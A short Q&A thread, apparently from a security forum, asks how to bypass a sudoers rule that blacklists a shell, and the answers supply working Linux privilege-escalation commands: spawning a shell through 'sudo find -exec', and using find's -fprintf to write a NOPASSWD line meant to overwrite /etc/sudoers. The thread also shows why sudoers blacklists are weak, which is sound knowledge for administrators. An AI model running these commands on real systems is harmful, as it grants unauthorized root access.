# Privilege Escalation - Sudoers File Rule bypass

Tags: linux

```
some_admin_user    ALL=/some_path/some_bin       ALL, !/some_path/some_sh
```

How to bypass the above `sudoers` rule.

Answer (score 1, accepted):

@wireghoul gives a simple solution.

However even if you prevent every shell on the machine:

```
cp /bin/bash /tmp/foo
chmod 777 /tmp/foo
sudo /bin/find / -exec /tmp/foo -i \;
```

The "noexec" functionality of sudo might help a bit. (https://linux.die.net/man/5/sudoers )

However I expect it is possible to trick find into writing whatever you want to any file (using -fprintf ), so I suspect a multi-step attack is possible, overwriting /etc/shadow or /etc/sudoers:

```
find / -fprintf /tmp/sudoers "some_admin_user ALL= NOPASSWD: ALL\n" -prune
```

Never execs anything.

Answer (score 3):

`sudo /bin/find / -type f -exec /bin/sh -i \;`